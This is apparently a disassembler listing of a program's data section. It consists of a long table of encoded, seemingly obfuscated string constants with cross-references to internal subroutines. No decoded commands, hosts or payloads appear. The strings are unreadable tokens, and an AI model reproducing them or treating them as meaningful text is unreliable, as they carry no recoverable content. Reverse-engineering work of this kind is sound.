aQbwgd0cfxf_ db 'qbwGd0CFxf./',0 ; DATA XREF: sub_40A938+114�o
; sub_40A938+1D0B�o ...
align 10h
a2mo7g0_b0qj db '2mo7G0.B0qj/',0 ; DATA XREF: sub_40A938+125�o
; sub_40A938+1D1C�o ...
align 10h
a47ff020f_0_ db '47Ff/020f.0.',0 ; DATA XREF: sub_40A938+A0�o
; sub_40A938+1D2D�o ...
align 10h
aHyomeIovtv_ db 'HyOMe/iovtV.',0 ; DATA XREF: sub_40A938+8A�o
; sub_40A938+1E44�o ...
align 10h
aPlsymAee6v1_0 db 'PlsYM/aEe6v1',0 ; DATA XREF: sub_40A938+1EEC�o
; sub_4155B9+481�o
align 10h
aCwxyh0ryouv1 db 'CwXYh0RYoUv1',0 ; DATA XREF: sub_40A938+1F2B�o
; sub_4155B9+48C�o
align 10h
aEavyh_ic0dc0 db 'eAvYh.IC0dc0',0 ; DATA XREF: sub_40A938+1F67�o
; sub_4155B9+497�o
align 10h
aUz3rf_vtkug1 db 'uz3rf.VTKug1',0 ; DATA XREF: sub_40A938+2022�o
; sub_4155B9+4A5�o
align 10h
aMaeyv0bdsgj0 db 'MAEyv0BdSGj0',0 ; DATA XREF: sub_4155B9+4B0�o
align 10h
aI3ncg_v5u4g_ db 'I3nCG.v5U4g.',0 ; DATA XREF: sub_4155B9+4BB�o
align 10h
a9bwj__lz2my0 db '9bWj..lZ2My0',0 ; DATA XREF: sub_40A938+136�o
; sub_40A938+2159�o ...
align 10h
aRiocl1kztwo0 db 'rioCl1kzTWO0',0 ; DATA XREF: sub_40A938+292�o
; sub_40A938+1725�o ...
align 10h
a_swwg1hqeii1 db '.SWwg1hqeiI1',0 ; DATA XREF: sub_40A938+188B�o
; sub_4155B9+4DC�o
align 10h
aG3obv_r6j7h db 'g3obv.r6j7H/',0 ; DATA XREF: sub_40A938+B6�o
; sub_40A938+F2F�o ...
align 10h
aM5spx_qp7lx_ db 'M5sPX.Qp7Lx.',0 ; DATA XREF: sub_40A938+CC�o
; sub_40A938+10AD�o ...
align 10h
aItx_n_wpamx_ db 'ITx.N.WPAmx.',0 ; DATA XREF: sub_40A938+1160�o
; sub_4155B9+500�o
align 10h
aLndk50vzcqw0 db 'LNdk50vzCqW0',0 ; DATA XREF: sub_40A938+1407�o
; sub_4155B9+50B�o
align 10h
a9ljbh07crkd_ db '9lJBH07crkD.',0 ; DATA XREF: sub_40A938+E2�o
; sub_40A938+15E1�o ...
align 10h
aAjttz06ztse1 db 'ajTtz06Ztse1',0 ; DATA XREF: sub_40A938+230C�o
; sub_4155B9+521�o
align 10h
aUn3hk0sn58o db 'uN3hk0sn58o/',0 ; DATA XREF: sub_40A938+232F�o
; sub_4155B9+52C�o
align 10h
aQrn4z10ge1i1 db 'QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+235E�o
; sub_4155B9+537�o
align 10h
aBvuso0ed3mw db 'bVUSO0ed3MW/',0 ; DATA XREF: sub_40A938+2380�o
; sub_4155B9+542�o
align 10h
aM1d_716jg1r1 db 'M1d.716Jg1r1',0 ; DATA XREF: sub_40A938+244C�o
; sub_4155B9+54D�o
align 10h
a6x2ka0buubb_ db '6x2Ka0buUbB.',0 ; DATA XREF: sub_40A938+2883�o
; sub_4155B9+55B�o
align 10h
aUqyil_iyvpi_ db 'uQYiL.iYvpI.',0 ; DATA XREF: sub_40A938+5A1C�o
; sub_4155B9+566�o
align 10h
a4qyyh1q2ps1 db '4QyYH1q/2ps1',0 ; DATA XREF: sub_40A938+5C11�o
; sub_4155B9+571�o
align 10h
aZgidu12tiv0 db 'ZGidU12tiV0/',0 ; DATA XREF: sub_40A938+5CD2�o
; sub_4155B9+57C�o
align 10h
aHgcrw_cwuf5_ db 'HGCRW.CWUF5.',0 ; DATA XREF: sub_40A938+5D06�o
; sub_4155B9+587�o
align 10h
aGztle_nhywf db 'gzTlE.nhywf/',0 ; DATA XREF: sub_40A938+5D26�o
; sub_4155B9+592�o
align 10h
aTvjro1ubgtg1 db 'TVJrO1uBGtg1',0 ; DATA XREF: sub_40A938+5DFA�o
; sub_4155B9+59D�o
align 10h
aL80reUvcue1 db 'l80re/UvCUe1',0 ; DATA XREF: sub_40A938+5DA6�o
; sub_4155B9+5A8�o
align 10h
aH1cmq0wqw5c_ db 'h1cMQ0wQw5C.',0 ; DATA XREF: sub_40A938+15F�o
; sub_40A938+5E5F�o ...
align 10h
aVxa_uCdd7s0 db 'VXA.u/cDD7S0',0 ; DATA XREF: sub_40A938+5E46�o
; sub_4155B9+5B6�o
align 10h
aSxytb1_eejq_ db 'SXYtb1.EEjQ.',0 ; DATA XREF: sub_40A938+170�o
; sub_40A938+642C�o ...
align 10h
aVb1r0N_arr0 db 'vB1r0/N.Arr0',0 ; DATA XREF: sub_40A938+181�o
; sub_40A938+643D�o ...
align 10h
a8im6i__c829_ db '8Im6i..C829.',0 ; DATA XREF: sub_40A938+192�o
; sub_40A938+644E�o ...
align 10h
aTiyj208fhvn_ db 'tIYj208FHvN.',0 ; DATA XREF: sub_40A938+1A3�o
; sub_40A938+645F�o ...
align 10h
a5ngN0zjh2i1 db '5nG/N0ZJh2i1',0 ; DATA XREF: sub_40A938+1B4�o
; sub_40A938+6470�o ...
align 10h
aMdf9n0kzpx60 db 'mdf9n0kzPX60',0 ; DATA XREF: sub_40A938+1C5�o
; sub_40A938+6481�o ...
align 10h
aAtfv_jgk0x1 db '/ATfv.jgK0X1',0 ; DATA XREF: sub_40A938+1D6�o
; sub_40A938+6492�o ...
align 10h
aFu6k10irsc1 db 'fu6k10iRsc/1',0 ; DATA XREF: sub_40A938+1E7�o
; sub_40A938+64A3�o ...
align 10h
a_luua_bruje0 db '.lUua.bruje0',0 ; DATA XREF: sub_40A938+1F8�o
; sub_40A938+64B4�o ...
align 10h
aKzqshDhric_ db 'kzqSH/dhRIc.',0 ; DATA XREF: sub_40A938+66A5�o
; sub_4155B9+632�o
align 10h
aUycsBekwp0 db '/uYcs/BEKWP0',0 ; DATA XREF: sub_40A938+211�o
; sub_40A938+66BE�o ...
align 10h
aWwfbf_0ptze_ db 'WWFBf.0ptzE.',0 ; DATA XREF: sub_40A938+67EA�o
; sub_4155B9+648�o
align 10h
aFhzdv1ootfg0 db 'fhzdV1OotFg0',0 ; DATA XREF: sub_40A938+22A�o
; sub_40A938+6803�o ...
align 10h
aUmk7x0pwyw9Qrn db 'Umk7x0PwyW9/QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+6959�o
; sub_4155B9+65E�o
align 4
aLees11vpbnf0 db 'LeEs11vPbnf0',0 ; DATA XREF: sub_40A938+2A10�o
; sub_4155B9+228�o
align 4
aLbjvg0r_qmb_ db 'lbJVg0r.qMb.',0 ; DATA XREF: sub_40A938+2A2F�o
; sub_4155B9+233�o
align 4
aA52n11svyfw0 db 'A52N11SVYFw0',0 ; DATA XREF: sub_40A938+2B22�o
; sub_4155B9+23E�o
align 4
aHj6vo0jrp9q0 db 'Hj6vo0JRP9Q0',0 ; DATA XREF: sub_40A938+2BED�o
; sub_4155B9+249�o
align 4
aR7wrsQhek_0 db 'r7WRs/qHek.0',0 ; DATA XREF: sub_40A938+2C9B�o
; sub_4155B9+254�o
align 4
aDuzcb0kgssv0 db 'DuzCb0KgSsv0',0 ; DATA XREF: sub_40A938+3236�o
; sub_4155B9+25F�o
align 4
aDqjso_47pdb db 'dQJSO.47pdb/',0 ; DATA XREF: sub_40A938+344C�o
; sub_4155B9+26A�o
align 4
aK9vUKkutm db 'K9V/U/KkuTM/',0 ; DATA XREF: sub_40A938+3513�o
; sub_4155B9+275�o
align 4
a7yfnz0pw11s1 db '7yfnz0PW11s1',0 ; DATA XREF: sub_40A938+35C1�o
; sub_4155B9+283�o
align 4
aNq_as1z1sit db 'nQ.As1Z1SIt/',0 ; DATA XREF: sub_40A938+366F�o
; sub_4155B9+28E�o
align 4
aUn3hk0sn58o_0 db 'uN3hk0sn58o/',0 ; DATA XREF: sub_40A938+36AD�o
; sub_4155B9+299�o
align 4
aQrn4z10ge1i1_0 db 'QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+371C�o
; sub_4155B9+2A4�o
align 4
aIegud0v_5_ db 'iEguD0V/.5/.',0 ; DATA XREF: sub_40A938+3757�o
; sub_4155B9+2AF�o
align 4
aFc9kk1jx11g_ db 'fc9Kk1jX11G.',0 ; DATA XREF: sub_40A938+379A�o
; sub_4155B9+2BA�o
align 4
aDnjq8Ze3zw db 'DnjQ8/ze3ZW/',0 ; DATA XREF: sub_40A938+3807�o
; sub_4155B9+2C5�o
align 4
aEwqxaOc1t_ db 'EWqxA//oC1T.',0 ; DATA XREF: sub_40A938+395B�o
; sub_4155B9+2D0�o
align 4
aJiatz0xsump1 db 'JIAtz0xSuMp1',0 ; DATA XREF: sub_40A938+3D36�o
; sub_4155B9+2DE�o
align 4
aVi0qa1mvfro1 db 'VI0QA1mvfro1',0 ; DATA XREF: sub_40A938+3E33�o
; sub_4155B9+2E9�o
align 4
aW3gp6_13acy1 db 'W3GP6.13AcY1',0 ; DATA XREF: sub_40A938+3F1F�o
; sub_4155B9+2F4�o
align 4
aE8qiq0hukv9 db 'e8qiq0Hukv9/',0 ; DATA XREF: sub_40A938+3F65�o
; sub_4155B9+2FF�o
align 4
a18rjk_sa2je db '18Rjk.sa2JE/',0 ; DATA XREF: sub_40A938+3FD5�o
; sub_4155B9+30A�o
align 4
aLjAmKzrtp1 db 'lJ/am/kZRtP1',0 ; DATA XREF: sub_40A938+40A5�o
; sub_4155B9+315�o
align 4
aXzaru0amxhi_ db 'XZArU0aMxhi.',0 ; DATA XREF: sub_40A938+4198�o
; sub_4155B9+320�o
align 4
aRa7e2Hhxpf0 db 'rA7E2/hHXPf0',0 ; DATA XREF: sub_40A938+4281�o
; sub_4155B9+32B�o
align 4
aRp4sr11cvr1 db 'Rp4sR11CvR1/',0 ; DATA XREF: sub_40A938+439D�o
; sub_4155B9+339�o
align 4
aZqrvt0t6nmz_ db 'ZqrVt0t6nmZ.',0 ; DATA XREF: sub_40A938+44CC�o
; sub_4155B9+344�o
align 4
a1shta0bzfwk1 db '1ShtA0bzFwk1',0 ; DATA XREF: sub_40A938+457A�o
; sub_4155B9+34F�o
align 4
aAzcsp_hkilo_ db 'AZcsP.hkiLO.',0 ; DATA XREF: sub_40A938+45DE�o
; sub_4155B9+35A�o
align 4
aFepmfZswfd db 'FEpMF/ZswFD/',0 ; DATA XREF: sub_40A938+465F�o
; sub_4155B9+365�o
align 4
aHpmch0pbq800 db 'HPmCH0PbQ800',0 ; DATA XREF: sub_40A938+51A3�o
; sub_4155B9+66C�o
align 4
aUfbss0cbo8c__0 db 'uFbSS0Cbo8C.',0 ; DATA XREF: sub_40A938+243�o
; sub_40A938+5594�o ...
align 4
aNoazx1alvg0 db 'NoaZx1Alvg/0',0 ; DATA XREF: sub_40A938+257�o
; sub_40A938+578D�o ...
align 4
a7fugu_n0u2m1 db '7FUgU.N0U2m1',0 ; DATA XREF: sub_40A938+2AB�o
; sub_40A938+6972�o ...
align 4
aW3dwl46o0u0 db 'w3dWL/46o0u0',0 ; DATA XREF: sub_40A938+6BA2�o
; sub_4155B9+698�o
align 4
aUbqs_hzpkh1 db '/uBQS.HZPkh1',0 ; DATA XREF: sub_40A938+2C2�o
; sub_40A938+6BB9�o ...
align 4
a6x7zf1eztny_ db '6x7zf1EztnY.',0 ; DATA XREF: sub_40A938+2D3�o
; sub_40A938+6BCA�o ...
align 4
a7otcu0fic6v0 db '7otcU0FiC6V0',0 ; DATA XREF: sub_40A938+2F5�o
; sub_40A938+6BEC�o ...
align 4
aFyflu0ji3xh_ db 'FyFlU0jI3XH.',0 ; DATA XREF: sub_40A938+2E4�o
; sub_40A938+6BDB�o ...
align 4
aDnjyk0fwki__ db 'dnjYk0fWkI..',0 ; DATA XREF: sub_40A938+6BFD�o
; sub_4155B9+6D2�o
align 4
aXmz20Gjkq db 'xMz20//gJkQ/',0 ; DATA XREF: sub_40A938+306�o
; sub_40A938+6C14�o ...
align 4
aNhr6r0qsk450 db 'nHr6r0qsk450',0 ; DATA XREF: sub_40A938+6E2D�o
; sub_4155B9+6E8�o
align 4
aX_62c_3ldcp db 'X.62C.3LDCP/',0 ; DATA XREF: sub_40A938+31D�o
; sub_40A938+7784�o ...
align 4
aWt4rnWgl6v_ db 'wt4Rn/WGL6V.',0 ; DATA XREF: sub_40A938+79BD�o
; sub_4155B9+6FE�o
align 4
aImvbw1shwxq0 db 'iMvbW1SHwxQ0',0 ; DATA XREF: sub_40A938+334�o
; sub_40A938+7555�o ...
align 4
a4h4m_q_guy_ db '4h4m/.Q.GUy.',0 ; DATA XREF: sub_40A938+776D�o
; sub_4155B9+714�o
align 4
aPsern1aagh6_ db 'pSern1AAGh6.',0 ; DATA XREF: sub_40A938+35C�o
; sub_40A938+7085�o ...
align 4
aXkg84_cesgs_ db 'XkG84.cESgs.',0 ; DATA XREF: sub_40A938+369�o
; sub_40A938+7220�o ...
align 4
aUyfog_dvvny0 db 'UyfOG.DvVnY0',0 ; DATA XREF: sub_40A938+34B�o
; sub_40A938+6E44�o ...
align 4
aP06vqBfbmo_ db 'p06vq/BFBMo.',0 ; DATA XREF: sub_40A938+376�o
; sub_40A938+73CB�o ...
align 4
a3vvsv1vurua db '3VVsV1VuRUA/',0 ; DATA XREF: sub_40A938+753E�o
; sub_4155B9+74E�o
align 4
aW1w2v121jsp_ db 'w1w2V121JSP.',0 ; DATA XREF: sub_40A938+383�o
; sub_40A938+79D4�o ...
align 4
aVz62d1m0yya db 'Vz62d1m0Yya/',0 ; DATA XREF: sub_40A938+7B5E�o
; sub_4155B9+764�o
align 4
aF4c9z1ubcg80 db 'F4c9z1UBCg80',0 ; DATA XREF: sub_40A938+7B6F�o
; sub_4155B9+76F�o
align 4
a2yclo0srxpi db '2YClO0SRxpi/',0 ; DATA XREF: sub_40A938+7CD5�o
; sub_4155B9+77D�o
align 4
aH3yh9_xq_s2_ db 'h3YH9.Xq.S2.',0 ; DATA XREF: sub_40A938+7CEC�o
; sub_4155B9+788�o
align 4
aIwbkf0o1om6Qrn db 'IwBKf0O1Om6/QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+7E9B�o
; sub_4155B9+793�o
align 4
aKmdie1uwntq db 'KmdIe1UwntQ/',0 ; DATA XREF: sub_40A938+3A4�o
; sub_40A938+8142�o ...
align 4
aUpx0wCz2ei0qrn db 'UPx0W/cz2EI0QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+8291�o
; sub_4155B9+7A9�o
align 4
aV6jbh0k4uD_ db 'V6jBH0k4u/d.',0 ; DATA XREF: sub_40A938+3BD�o
; sub_40A938+82C3�o ...
align 4
aB2smo_whkew_qr db 'B2smo.WHkeW.QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+836E�o
; sub_4155B9+7BF�o
align 10h
aVxg7n_qbmg90aa db 'vXG7N.qBMG90aA/Td0EX07M1',0 ; DATA XREF: sub_40A938+83C1�o
; sub_4155B9+7CA�o
align 4
aEm42x_1iszi1 db 'Em42x.1IsZI1',0 ; DATA XREF: sub_40A938+397�o
; sub_40A938+7EB4�o ...
align 4
aErnniHm17t1qrn db 'ERNNi/HM17T1QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+8119�o
; sub_4155B9+7E3�o
align 4
aQ5l5f_2to_60 db 'q5l5f.2TO.60',0 ; DATA XREF: sub_40A938+85D7�o
; sub_40A938+8619�o ...
align 4
aJbkl4Fbwcf1 db 'jBKL4/FbWCF1',0 ; DATA XREF: sub_40A938+85E4�o
; sub_40A938+862D�o ...
align 4
aW3gp6_13acy1_0 db 'W3GP6.13AcY1',0 ; DATA XREF: sub_40A938+8642�o
; sub_4155B9+804�o
align 4
aM08se_kt9td1 db 'M08SE.Kt9tD1',0 ; DATA XREF: sub_40A938+872B�o
; sub_4155B9+80F�o
align 4
a3eowx2ocng db '3eowX/2OCnG/',0 ; DATA XREF: sub_40A938+8805�o
; sub_4155B9+81A�o
align 4
aS3dyJzo6r db 's3dY//JZo6r/',0 ; DATA XREF: sub_40A938+894D�o
; sub_4155B9+825�o
align 4
aUwher1dagd80 db 'UWher1DAGD80',0 ; DATA XREF: sub_40A938+8986�o
; sub_4155B9+833�o
align 4
aPnb_aBfzu60 db 'pNb.a/Bfzu60',0 ; DATA XREF: sub_40A938+89BF�o
; sub_4155B9+83E�o
align 4
aZu2s6_o7_yt db 'Zu2s6.O7.yt/',0 ; DATA XREF: sub_40A938+89D5�o
; sub_4155B9+849�o
align 4
a4hftz6holr db '4hftZ/6HOlR/',0 ; DATA XREF: sub_40A938+8A21�o
; sub_4155B9+854�o
align 4
aYqrdp_9rf4u0 db 'yqrdP.9rF4U0',0 ; DATA XREF: sub_40A938+8A76�o
; sub_4155B9+85F�o
align 4
a1uyis15kh_n1 db '1UyIs15KH.n1',0 ; DATA XREF: sub_40A938+8ABC�o
; sub_4155B9+86A�o
align 4
a9ljbh07crkd__0 db '9lJBH07crkD.',0 ; DATA XREF: sub_40A938+8B02�o
; sub_4155B9+875�o
align 4
aD0ron_ctdg0_ db 'D0roN.CTDg0.',0 ; DATA XREF: sub_40A938+8B19�o
; sub_40A938+8B8D�o ...
align 4
aFr8ri0f9nfz_ db 'fr8ri0f9NfZ.',0 ; DATA XREF: sub_40A938+8B37�o
; sub_40A938+8BAF�o ...
align 4
aWbzcx0Dknt_ db 'wbZcx0/Dknt.',0 ; DATA XREF: sub_40A938+8B55�o
; sub_40A938+8BD1�o ...
align 4
aNyjsr1cv5ch0 db 'NyJsR1cV5CH0',0 ; DATA XREF: sub_40A938+8C00�o
; sub_4155B9+8A4�o
align 4
aI6sd4ctzn0 db '/I6sD/4CTzn0',0 ; DATA XREF: sub_40A938+8F00�o
; sub_4155B9+8AF�o
align 4
aWrlthN3uh_1 db 'WRlth/n3Uh.1',0 ; DATA XREF: sub_40A938+8FAB�o
; sub_4155B9+8BA�o
align 4
aYqjsn0wtutn1 db 'yQJsn0wtUtn1',0 ; DATA XREF: sub_40A938+906D�o
; sub_4155B9+8C5�o
align 4
aTy2nt0oi2yk db 'ty2nT0oI2YK/',0 ; DATA XREF: sub_40A938+106�o
; sub_40A938+421�o ...
align 4
a6h4nn1igjm60 db '6h4NN1IGJm60',0 ; DATA XREF: sub_40A938:loc_40CCCE�o
; sub_40A938+240C�o ...
align 4
aUr6ne_mot50_ db 'Ur6ne.MOT50.',0 ; DATA XREF: sub_40A938+2703�o
; sub_40A938+2749�o ...
align 4
aHm1h_049e4o db 'Hm1H.049e4O/',0 ; DATA XREF: sub_40A938+299A�o
; sub_4155B9+90A�o ...
align 4
aWj27_1belx20 db 'wj27.1Belx20',0 ; DATA XREF: sub_4155B9+915�o
; sub_41BD3B+355�o
align 4
aPrttt0s3ag916n db 'pRTtT0s3aG916N5aw.affEY1',0 ; DATA XREF: sub_4155B9+8FF�o
align 4
aAl_N0kenp20 db 'Al./N0Kenp20',0 ; DATA XREF: sub_40A938+95�o
; sub_40A938+AB�o ...
align 4
aFfec81uznt81 db 'fFEC81UzNT81',0 ; DATA XREF: sub_40A938:loc_40AD3D�o
; sub_40A938+9DDC�o ...
align 4
aJvatg1988z81 db 'jVATg1988z81',0 ; DATA XREF: sub_40A938+AA3�o
; sub_40A938+9E4F�o ...
align 4
aMflx2_qu4vy_ db 'mflX2.QU4VY.',0 ; DATA XREF: .text:00401909�o
; sub_401990+F�o ...
align 4
aXlpyr1anpgm0 db 'xLpyR1aNPGm0',0 ; DATA XREF: sub_407E1C+72�o
; sub_40A938+21C�o ...
align 4
aWpukb_0uioaOfu db 'WPUkb.0uIoa/OFUur11TNYw0',0 ; DATA XREF: .text:0040A479�o
; .text:0040A4A2�o ...
align 10h
aC4dd9_nojvo1 db 'C4dD9.nojvO1',0 ; DATA XREF: sub_40A938+5BBF�o
; sub_40A938:loc_41053D�o ...
align 10h
aJt17j1imtvd1 db 'jt17J1ImTVD1',0 ; DATA XREF: sub_4020AA+CE�o
; sub_402CBA+489�o ...
align 10h
aLtlec18us5q0 db 'LTLec18US5q0',0 ; DATA XREF: sub_40A938+C1�o
; sub_40A938+F61�o ...
align 10h
a6atss0dycwf_6n db '6atSs0dyCWF.6N5aw.affEY1',0 ; DATA XREF: sub_40A938+D7�o
; sub_40A938+10E3�o ...
align 4
a7_pak0onymn7ra db '7.PaK0OnymN/7Razv/1FefF.',0 ; DATA XREF: sub_40A938+ED�o
; sub_40A938+15FF�o ...
align 4
aWhdag1glagf_ db 'WHdAg1glAgf.',0 ; DATA XREF: sub_40A938:loc_40AD25�o
; sub_40A938+4781�o ...
align 4
aLmecq0ygcok db 'lmecq0yGcoK/',0 ; DATA XREF: sub_40A938+4A92�o
; sub_40A938+4BFE�o ...
align 4
aRccsh_adukf1 db 'RcCSh.AdUKf1',0 ; DATA XREF: sub_40A938+51C9�o
; sub_40A938+51EB�o ...
align 4
aXu6cu1p_sn6_6n db 'XU6CU1p.SN6.6N5aw.affEY1',0 ; DATA XREF: sub_40A938+2A72�o
; sub_40A938+2AD3�o ...
align 4
aHuudgYqzdz db 'HuuDG/YQZDz/',0 ; DATA XREF: sub_40A938+24E�o
; sub_40A938+55DC�o ...
align 4
a6hwiyOatg9_6n5 db '6HWiy/OAtg9.6N5aw.affEY1',0 ; DATA XREF: sub_40A938+262�o
; sub_40A938+57A6�o ...
align 10h
aPtami1_agv db 'PTaMI1/.aGV/',0 ; DATA XREF: sub_40A938+8844�o
; sub_40A938:loc_41319A�o ...
align 10h
aUhdhc1pcv9i db 'uhdhC1pCV9i/',0 ; DATA XREF: sub_40A938:loc_40BE45�o
; sub_4155B9+9EC�o ...
align 10h
aWulzr_x7xjb0 db 'WUlZR.X7XjB0',0 ; DATA XREF: sub_40A938+29D�o
; sub_40A938+1743�o ...
align 10h
aBjatzQyrs11 db 'BjAtz/qyRS11',0 ; DATA XREF: sub_40A938+2B6�o
; sub_40A938+69CF�o ...
align 10h
aBvygm_afzkh0 db 'BVYGm.aFzkh0',0 ; DATA XREF: sub_40A938:loc_40AD19�o
; sub_40A938+6C08�o ...
align 10h
aLcgg60qk2mf0 db 'Lcgg60QK2mf0',0 ; DATA XREF: sub_40A938+311�o
; sub_40A938+6C68�o ...
align 10h
aYhzck13caog0 db 'YhzCK13CaOG0',0 ; DATA XREF: sub_40A938:loc_40AD12�o
; sub_40A938+6EA3�o ...
align 10h
aAxauo_rlggx0 db 'aXauo.rLGgX0',0 ; DATA XREF: sub_40A938+33F�o
; sub_40A938+75B2�o ...
align 10h
aVfeso_qcgdt_ db 'vfEsO.QcgDt.',0 ; DATA XREF: sub_40A938+38E�o
; sub_40A938+7AAC�o ...
align 10h
aSsoce0jbtxi db 'sSOce0JbTXI/',0 ; DATA XREF: sub_40A938+7D26�o
; sub_40A938+7DA9�o ...
align 10h
aQsoz9_vfvwu0 db 'QSOZ9.vFVWu0',0 ; DATA XREF: sub_40A938:loc_40ACE7�o
; sub_40A938+7F1C�o ...
align 10h
aXiw8_1hhx7d1 db 'Xiw8.1HHX7d1',0 ; DATA XREF: sub_4155B9+A60�o
; sub_420399+14F�o ...
align 10h
aO_sxv_ze9bk1go db 'O.sxv.ze9bK1GOISY.dO.Vn1',0 ; DATA XREF: sub_40A938+69�o
; sub_40A938+A5F�o ...
align 4
aXwzwo1pqcgt16n db 'XWzwO1PqcgT16N5aw.affEY1',0 ; DATA XREF: sub_40A938+328�o
; sub_40A938+77E1�o ...
align 4
a5oke1awbzq db '5OkE/1AWBZq/',0 ; DATA XREF: sub_4020AA+C9�o
; sub_406C3A+B5�o ...
align 4
aIhfnL6b5x db '/iHFN/l6B5X/',0 ; DATA XREF: sub_40A938+FCF�o
; sub_40A938+1637�o ...
align 4
aAsqfy_k1uah0 db 'AsQfy.K1uah0',0 ; DATA XREF: sub_4155B9+A8C�o
; sub_418A0D+126�o ...
align 4
aBnjcz_zig1m0 db 'bNJcZ.ziG1m0',0 ; DATA XREF: sub_403374+6B�o
; sub_40A938+8396�o ...
align 4
aSfe3h0kclgx0 db 'SFe3H0kCLgx0',0 ; DATA XREF: sub_40242A+1C6�o
; sub_4155B9+AA2�o ...
align 4
aYdidb16dnmq_ db 'YdidB16dnMQ.',0 ; DATA XREF: sub_40242A+A7�o
; sub_40242A+C9�o ...
align 4
aQvdspRbq6w0 db 'QvDsp/rBQ6w0',0 ; DATA XREF: sub_4155B9+ABB�o
; sub_4181F4+3F8�o ...
align 4
aVv3aj1ywfkc_xz db 'VV3AJ1ywFkC.XzinP/s/R0A.',0 ; DATA XREF: sub_40A938+52BD�o
; sub_40A938+533F�o ...
align 4
aNd4qzY5xml0rna db 'nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A.',0 ; DATA XREF: sub_4155B9+AD1�o
; sub_4181F4+722�o ...
align 4
aRy6iq0udbph db 'RY6IQ0UDbPh/',0 ; DATA XREF: sub_4155B9+ADC�o
; sub_4181F4+241�o ...
align 4
aW3nki_guvjx db 'w3NKI.gUvJx/',0 ; DATA XREF: sub_4155B9+AE7�o
; sub_4181F4+6A9�o ...
align 4
aRy6iq0udbphLlD db 'RY6IQ0UDbPh/LL/Dw.r3B9K/',0 ; DATA XREF: sub_40A938+5686�o
; sub_40A938+5747�o ...
align 4
aRy6iq0udbphN2n db 'RY6IQ0UDbPh/N2NHs/pc9zb/8Wb3v063Ds00',0 ; DATA XREF: sub_40A938+5912�o
; sub_4155B9+AFD�o ...
align 10h
a8cbgoRjryr_ db '8CBGO/rJRYr.',0 ; DATA XREF: sub_4020AA+B4�o
; sub_40A938+220C�o ...
align 10h
aKbwmi16jfhl db 'KbwMi16jFhl/',0 ; DATA XREF: sub_4020AA+C4�o
; sub_402646+B3�o ...
align 10h
aIde746o6B_ db 'Ide74/6o6/B.',0 ; DATA XREF: sub_402646+AE�o
; sub_4155B9+B21�o
align 10h
aY2lm40nv3yaP4m db 'Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1',0 ; DATA XREF: sub_40A938+62C3�o
; sub_40A938+63B4�o ...
align 4
a7zfry0iusme1 db '7Zfry0IUSmE1',0 ; DATA XREF: .text:004086C7�o
; .text:00408758�o ...
align 4
a_9fty1n2tM_ db '.9ftY1N2T/m.',0 ; DATA XREF: sub_401B6E+1E8�o
; sub_401B6E+278�o ...
align 4
aVxppy0owq7d db 'VxPpy0owQ7D/',0 ; DATA XREF: sub_401B6E+190�o
; sub_401B6E+21D�o ...
align 4
aW50oj_ac8ak0 db 'w50OJ.ac8AK0',0 ; DATA XREF: sub_401B6E+1E3�o
; sub_401B6E+273�o ...
align 4
aVgh9x1uWay0 db 'VgH9X1u/wAY0',0 ; DATA XREF: sub_401B6E+1C0�o
; sub_401B6E+251�o ...
align 4
aEih0f1gakfp0 db 'EiH0f1GakFP0',0 ; DATA XREF: sub_401B6E+23B�o
; sub_4063FA+1CE�o ...
align 4
aUfbss0cbo8c_ db 'uFbSS0Cbo8C.',0 ; DATA XREF: sub_401B6E+1A8�o
; sub_401B6E+22F�o ...
align 4
aLvk_hHddio0 db 'Lvk.H/hddio0',0 ; DATA XREF: sub_401B6E+195�o
; sub_401B6E+222�o ...
align 4
aJsuah_0_mmw0zb db 'JsuAH.0.mmW0zbFKT0RKhRb0',0 ; DATA XREF: sub_401B6E+185�o
; sub_401B6E+212�o ...
align 4
aAqq27_7qqv10 db 'AQQ27.7qQv10',0 ; DATA XREF: sub_401B6E+17A�o
; sub_401B6E+207�o ...
align 4
a2Afm0dt3o6_ db '2/Afm0dt3o6.',0 ; DATA XREF: .text:0040865F�o
; .text:loc_4086E4�o ...
align 4
aQvp40nd9f2 db '/qvP40nD9F2/',0 ; DATA XREF: sub_4155B9+BB3�o
; sub_420399+29C�o ...
align 4
aMkk0_mvscp_hwh db 'mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp.h0vRRTD1Po4dT/gU924/',0
; DATA XREF: sub_4155B9+BC1�o
; sub_420399+25E�o ...
align 4
aShktk1eNl8Jlzt db 'sHKtk1e/Nl8/jLZte1JtI/t1',0 ; DATA XREF: sub_4155B9+BCC�o
; sub_420399+14A�o
align 10h
aZcm1__num3n0oe db 'ZcM1..nUM3N0OE819.1TEYD.',0 ; DATA XREF: sub_4155B9+BD7�o
; sub_420399+208�o
align 4
a5_xnq0cowxs0 db '5.Xnq0cowXs0',0 ; DATA XREF: sub_40A938+8E8�o
; sub_40A938+90F�o ...
align 4
a8y4sz09fdh50tc db '8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNReP/bJcGz.',0
; DATA XREF: sub_40A938+933�o
; sub_40A938+955�o ...
align 10h
aRnyaa0crtpo0yy db 'RNYAA0crTPO0yYB2h.Fe8bw.iRLzu0EdQ3j/1D6Op1DNN3X.',0
; DATA XREF: sub_40A938+968�o
; sub_4155B9+BF8�o
align 4
aEuior0ay2w7_ db 'EUIOR0ay2w7.',0 ; DATA XREF: sub_40A938+8D7�o
; sub_40A938+9C7�o ...
align 4
aTfee90w_vdg1u8 db 'TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/',0 ; DATA XREF: sub_403374+82�o
; sub_403374:loc_403414�o ...
align 4
aIbtox1Hofe0hcx db 'IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/',0 ; DATA XREF: sub_403374+C3�o
; sub_40A938+D17�o ...
align 4
aTpzyk0moe8_0jt db 'TpzyK0MOE8.0jTPEZ1dC0uG0',0 ; DATA XREF: sub_40A938+D68�o
; sub_40A938+D8E�o ...
align 10h
a4ezrg1ye5hp1o2 db '4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0',0 ; DATA XREF: sub_40A938+DA4�o
